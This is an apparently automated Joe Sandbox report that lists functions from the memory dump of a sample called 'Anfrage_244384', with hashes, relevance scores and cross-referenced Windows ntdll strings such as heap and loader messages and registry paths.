API String ID: 0-1537733988
Opcode ID: 55289f343088d411882208aa5498a8adef224e5320d331e9bad6db7095ccaa87
Instruction ID: be9df99019dc3f4765cd76ab5a34a5be55e9e7932e0cffc4dceba7b5c9c36cb9
Opcode Fuzzy Hash: 55289f343088d411882208aa5498a8adef224e5320d331e9bad6db7095ccaa87
Instruction Fuzzy Hash: AF7189B4609B01DFE300CF24C994A1BBBE9BF98658F204D1EE59987290DB31DD49CF96

Function 3474B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON

Download Yara Rule

Strings

GlobalizationUserSettings, xrefs: 3474B834
TargetNtPath, xrefs: 3474B82F
\Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3474B82A

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
API String ID: 0-505981995
Opcode ID: 94fdd9d8931bc74bbb496e608f92255fe63452d96f29f3731ee81ad01549642f
Instruction ID: 53f6d6a9f27ac9c8db53e746ee132f66aee7abb64c534858e0b97ed5adefdeca
Opcode Fuzzy Hash: 94fdd9d8931bc74bbb496e608f92255fe63452d96f29f3731ee81ad01549642f
Instruction Fuzzy Hash: 61615D72901228EFEB21DF94DC8CBA9B7B9EF14750F4101E9A508AB351DB349E84CF94

Function 3466F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 346CE6A6
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 346CE6C6
HEAP: , xrefs: 346CE6B3

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: 3b88eca8db662ec83f2f6a409ff011a45cd33ed888215579624e775d7b2c4991
Instruction ID: b6a63faa4d5d70c35da14b4f05f13ee7b9e09ff2ec80a9a0821a601795f8684c
Opcode Fuzzy Hash: 3b88eca8db662ec83f2f6a409ff011a45cd33ed888215579624e775d7b2c4991
Instruction Fuzzy Hash: 6551AE75700B84EFE716CFA8C984B9ABBF8EF05744F0400A9E5468B692D778ED41CB51

Function 346915F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 346DA589
minkernel\ntdll\ldrmap.c, xrefs: 346DA59A
LdrpCompleteMapModule, xrefs: 346DA590

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: a3e33e7b4ecaf97b0020a85ea8bb97c879c9d6a21341957bf7b4711cf5f5e753
Instruction ID: 017d37eefe2e4ab8d7041f5dc6099bf959719a118b188593fdc4498f69307a40
Opcode Fuzzy Hash: a3e33e7b4ecaf97b0020a85ea8bb97c879c9d6a21341957bf7b4711cf5f5e753
Instruction Fuzzy Hash: 5B51FFB8B04784DFF711CE18CD40B8A77E8EB51764F2806A9E9509B6E2DBB4EC40CB45

Function 3466758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

Invalid address specified to %s( %p, %p ), xrefs: 346CAFCB
HEAP[%wZ]: , xrefs: 346CAFAB
HEAP: , xrefs: 346CAFB8

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: eb3cfab582237369ab776bcb7864bd9e4024390461be83f7f0241a4b08e2d11b
Instruction ID: 1049209c7247960ff718f2f905a5223841a70cf8d19a009eef155da53b94a0fd
Opcode Fuzzy Hash: eb3cfab582237369ab776bcb7864bd9e4024390461be83f7f0241a4b08e2d11b
Instruction Fuzzy Hash: F74136B8300380CFFB14DE19C8907AA77E5DF12388F5484AED456CB656DA78EC86CB52

Function 346A16CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrtls.c, xrefs: 346E1B4A
TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 346E1B39
LdrpAllocateTls, xrefs: 346E1B40

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
API String ID: 0-4274184382
Opcode ID: 996229d02bde2e4fd1ff676d068d84e263570f6d78f34804ff585480929635c4
Instruction ID: 0de9891d78a8b976d03b8bdd21cd43d3b01be9de99e8bf7ba7a88afacb883729
Opcode Fuzzy Hash: 996229d02bde2e4fd1ff676d068d84e263570f6d78f34804ff585480929635c4
Instruction Fuzzy Hash: 474166B5A01609EFEB15CFA8C940AEEBBF6FF98314F108159E405A7250EB35AC41DF94

Function 34725180 Relevance: 3.9, Strings: 3, Instructions: 114COMMON

Download Yara Rule

Strings

Leaked Block 0x%p size 0x%p (stack %p depth %u), xrefs: 347252AB
HEAP[%wZ]: , xrefs: 34725284
HEAP: , xrefs: 34725291

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
API String ID: 0-964947082
Opcode ID: 8e9a7fad9cf94012945fa1075ccc19816b7511bdd3ac327397a270f9f8dde1f0
Instruction ID: 136db41e2882614a4a8762eccba296448617978442550c49280327a2e872514b
Opcode Fuzzy Hash: 8e9a7fad9cf94012945fa1075ccc19816b7511bdd3ac327397a270f9f8dde1f0
Instruction Fuzzy Hash: BA419EB5601394EFEB50CF558A80AAA3BEAEB44394F40416EE901AF391CB34E845CF94

Function 346A33A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context data, xrefs: 346E29FE
Actx , xrefs: 346A33AC
RtlCreateActivationContext, xrefs: 346E29F9

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: 84c930f8015973bbdcb9f2733765968d49a65a69126b0d8e4817bf67dc3bc7e5
Instruction ID: 5364d3cb0dab4f3a2fc54d396b9b3b27fe0eea7efa1d38463d18964fe2f3ad08
Opcode Fuzzy Hash: 84c930f8015973bbdcb9f2733765968d49a65a69126b0d8e4817bf67dc3bc7e5
Instruction Fuzzy Hash: C53144B2600705DFEB22CF98D894BAA77A5EB84720F414469FD059F286CB30EC85CB90

Function 346FB594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

@, xrefs: 346FB670
GlobalFlag, xrefs: 346FB68F
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 346FB632

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: 9d20acc31f8eb94f70535a7cd88d740d1196936d11bce7b4fb34bc8c481e3b2d
Instruction ID: 49cd967c51fe682befeb25f1a57137fc6f80ff6ef3793b89628e082fd346ab35
Opcode Fuzzy Hash: 9d20acc31f8eb94f70535a7cd88d740d1196936d11bce7b4fb34bc8c481e3b2d
Instruction Fuzzy Hash: B0315AB5E00209AFEB00DF95DC84EEEBBBCEF44744F40046DE605A7150D7359A04CBA4

Function 347113B9 Relevance: 3.9, Strings: 3, Instructions: 101COMMON

Download Yara Rule

Strings

@, xrefs: 347113F3
\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control, xrefs: 347113C4
OsBootstatPath, xrefs: 34711410

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
API String ID: 0-1050206962
Opcode ID: 911dccc7298a4c156561a570b8559a2457600279d47066d9f134462aa21f9774
Instruction ID: 9847419c694861c5701adea3c22de2983aebf470609b71cc0f456275d77e9d4b
Opcode Fuzzy Hash: 911dccc7298a4c156561a570b8559a2457600279d47066d9f134462aa21f9774
Instruction Fuzzy Hash: 65318EB2D00219FFEB11DF95CC84EAEBBBDEB48A58F410465E904BB210D7349D448BE5

Function 346A1607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrtls.c, xrefs: 346E1A51
DLL "%wZ" has TLS information at %p, xrefs: 346E1A40
LdrpInitializeTls, xrefs: 346E1A47

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
API String ID: 0-931879808
Opcode ID: 010298c23e83d438934012c4909cd86d020ba9d07c1c0366d7c25dcb4a5e2ccf
Instruction ID: 6e7483eb3153287ceae6920ed1b863e1bc255ed1398f6dc9fe350419bdd2e4f0
Opcode Fuzzy Hash: 010298c23e83d438934012c4909cd86d020ba9d07c1c0366d7c25dcb4a5e2ccf
Instruction Fuzzy Hash: 4731D1B1B00705EFF7108F48C985FEA77AEEB507A4F080159E500FB290EB74AD45AB94

Function 346674B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 346CAEC0

Strings

RtlValidateHeap, xrefs: 346674ED, 3466752F

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: RtlValidateHeap
API String ID: 3446177414-1797218451
Opcode ID: c48b9b40d684b4adc9854d7e91781a6dae9106ee00752b16376b330c92c6d79f
Instruction ID: b9cf3ff238932908cccb2f3e1b0853fc78703c53051632c898783e30c1876b7c
Opcode Fuzzy Hash: c48b9b40d684b4adc9854d7e91781a6dae9106ee00752b16376b330c92c6d79f
Instruction Fuzzy Hash: F0410276B00345DFEF02CF64C8907ADBBB2FF94215F048299D4525B281CB389D01DB96

Function 3471705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 347170C2

Strings

kLsE, xrefs: 347170A4

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: kLsE
API String ID: 3446177414-3058123920
Opcode ID: 2c061b787e70f03ce8fbeae4cc37fb0c6e963cbf883c6dfe14cd53fc49f8ea0f
Instruction ID: eaf9f19200b9a9c2b2eade950c8674bfc315f16c505570cc97ed9c80adf3d858
Opcode Fuzzy Hash: 2c061b787e70f03ce8fbeae4cc37fb0c6e963cbf883c6dfe14cd53fc49f8ea0f
Instruction Fuzzy Hash: 7641F3B1501351DBF7219F60C888BE53B97EB41764FA4065DEC50AE2E1CBA84886CBA9

Function 346852A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 346855A3
@, xrefs: 34685445

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 37adbdf5b8465b9faa87807ec3f50074a67a5ec8f24ae430452eb74124e5efda
Instruction ID: 9163b5f9db51c645955434a383f7c5bdda73cfafcb45ffd2d8eb97faf994aa46
Opcode Fuzzy Hash: 37adbdf5b8465b9faa87807ec3f50074a67a5ec8f24ae430452eb74124e5efda
Instruction Fuzzy Hash: 9832BEB86083118FE764CF14C4A076EB7E5EF99784F50492EF9859B2A0E734D984CB53

Function 34675702 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34675778
RtlDebugPrintTimes.NTDLL ref: 346D0816

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: a7540bb5fc8e4ffcc470752886da8541c1a3dfef6519a7b4129639a35690e26a
Instruction ID: aceacff75ee054f20ee2e399ad76310da03e201ccf177c9668ac93ddbeebe301
Opcode Fuzzy Hash: a7540bb5fc8e4ffcc470752886da8541c1a3dfef6519a7b4129639a35690e26a
Instruction Fuzzy Hash: 2D31BE35701B06EFEB858F64CA90A89FBAAFF48398F405065E90087E50DB70F821CBD5

Function 346A5CC0 Relevance: 2.7, Strings: 2, Instructions: 241COMMON

Download Yara Rule

Strings

TargetPath, xrefs: 346E3CC5, 346E3CCA
@, xrefs: 346E3C93

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: @$TargetPath
API String ID: 0-4164548946
Opcode ID: 8a737a70cdd91cf67085734649a319f20367049c25a95574fbcfdfc4a82d34a6
Instruction ID: 2fb74922b36b81e28281c82c63aa68b65b82f59e4998bb29537fe68c3556d970
Opcode Fuzzy Hash: 8a737a70cdd91cf67085734649a319f20367049c25a95574fbcfdfc4a82d34a6
Instruction Fuzzy Hash: DB810DB5905706EFEB10DF18C894A6BB7F8FB94758F41892EE8459B210D730DC89CB82

Function 346FBC10 Relevance: 2.7, Strings: 2, Instructions: 234COMMON

Download Yara Rule

Strings

\Software\Microsoft\Windows, xrefs: 346FBEBF
\REGISTRY\USER\, xrefs: 346FBE76

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: \REGISTRY\USER\$\Software\Microsoft\Windows
API String ID: 0-4122831824
Opcode ID: 4593b59964315ebee30d2c308e653ec36e79cd134ea64c06f0a1308deff6f1ea
Instruction ID: e028a8a3591ca5bf36bc291e8e9288d7b19a898be684403fc8d33c290fee1b6b
Opcode Fuzzy Hash: 4593b59964315ebee30d2c308e653ec36e79cd134ea64c06f0a1308deff6f1ea
Instruction Fuzzy Hash: E191AEB5204701DFD710CF24C884BABB7E9FB88B64F100A2DE5A5C7290EB35D945CB56

Function 347416A6 Relevance: 2.7, Strings: 2, Instructions: 221COMMON

Download Yara Rule

Strings

W, xrefs: 34741778
svchost.exe, xrefs: 34741971

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: W$svchost.exe
API String ID: 0-2987975405
Opcode ID: 0580fef6797f91701bae957bd3f33726cf248592a33cc233c8fcf417bd1b942c
Instruction ID: bbec4bd779203788d1ef338c455ad9d1767b29fe2c7df4d4173382940a146309
Opcode Fuzzy Hash: 0580fef6797f91701bae957bd3f33726cf248592a33cc233c8fcf417bd1b942c
Instruction Fuzzy Hash: 3EA136B5E00768CFEB25DF26C884BE9B7B5EB49315F0045E9D849AB341E7349A80CF80

Function 34667CD5 Relevance: 2.7, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

@[v4, xrefs: 346CB34A, 346CB394, 346CB497, 346CB473, 346CB3E5, 346CB377, 346CB34E, 346CB37B, 346CB409
@[v4@[v4, xrefs: 346CB41E, 34667D2A

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: @[v4$@[v4@[v4
API String ID: 0-1966832869
Opcode ID: a67a3fbe17154402e1e69b059bbbd7097f11746ed8933589e87801cb46ef781d
Instruction ID: f62966dd9220ce6f84504231366b32df7605b451b17b89bba70e8720a4725e8c
Opcode Fuzzy Hash: a67a3fbe17154402e1e69b059bbbd7097f11746ed8933589e87801cb46ef781d
Instruction Fuzzy Hash: C3519DB1105742EFE721CF25C840B2ABBE8FF50658F104D1EE49A9B250E739E845CBD6

Function 3468F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

$, xrefs: 3468F7F6
$, xrefs: 3468F860

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$
API String ID: 3446177414-233714265
Opcode ID: 6b6d2914f43009fb2f527b47e78364494945b9b28037a1937264f4e6c80a3045
Instruction ID: edb68b4e3ef45ad4d580a35f125e19fb96f912fed329f42d8ffb7fc3eea93996
Opcode Fuzzy Hash: 6b6d2914f43009fb2f527b47e78364494945b9b28037a1937264f4e6c80a3045
Instruction Fuzzy Hash: 2D61DEB1E00749DFEB24CFA4C580B9DB7FAFF48308F104469D519AB680CB78A945CB95

Function 347035BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Enter, xrefs: 347035EC
LdrResGetRCConfig Exit, xrefs: 347035FE

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: 170cc1da3765b8d41a48babd47e99230f7792868a2ea7bbf4c953f5a3278d823
Instruction ID: 15fd06e42cf7317bc6b2546c9f53fe5f3a3da7dd7ad39c3664a55fb17f5eec36
Opcode Fuzzy Hash: 170cc1da3765b8d41a48babd47e99230f7792868a2ea7bbf4c953f5a3278d823
Instruction Fuzzy Hash: 0631BA7520A7419FE301CF69D854B2AB3E9FF89750F00486EB884CB390EB71D805CB96

Function 346A329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

.Local\, xrefs: 346A32B5
@, xrefs: 346A330D

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: c4d4cf7445f3fc847353cc50c8da48f7086476c8beafc3e788f5f41bf57f6021
Instruction ID: 4f9b08797c3cab8c6167d4639a1473f84cf8376c9bfffef385f07f1b642abe7e
Opcode Fuzzy Hash: c4d4cf7445f3fc847353cc50c8da48f7086476c8beafc3e788f5f41bf57f6021
Instruction Fuzzy Hash: C3319EF660CB44DFE311CF29C980A5BBBE8EBD5694F40092EF99483210DA31DD448B92

Function 346A34B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 346E2A95
RtlpInitializeAssemblyStorageMap, xrefs: 346E2A90

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
API String ID: 0-2653619699
Opcode ID: 152644e8e1e8c26517d0e3a0d165b23d7d3e604dcd1b4338510844b25090ef76
Instruction ID: bed236ac53a51f5df91ca0d32cfc8a78aa3bfcbd2fac34894a91b6f28ed35a0c
Opcode Fuzzy Hash: 152644e8e1e8c26517d0e3a0d165b23d7d3e604dcd1b4338510844b25090ef76
Instruction Fuzzy Hash: E31106B6B01304EBF7298E88CD45F6A76EEDB94B54F14806D7904EB240DA74CD4096A0

Function 3469B2C0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON

Download Yara Rule

Strings

@[v4@[v4, xrefs: 3469B2DC

Memory Dump Source

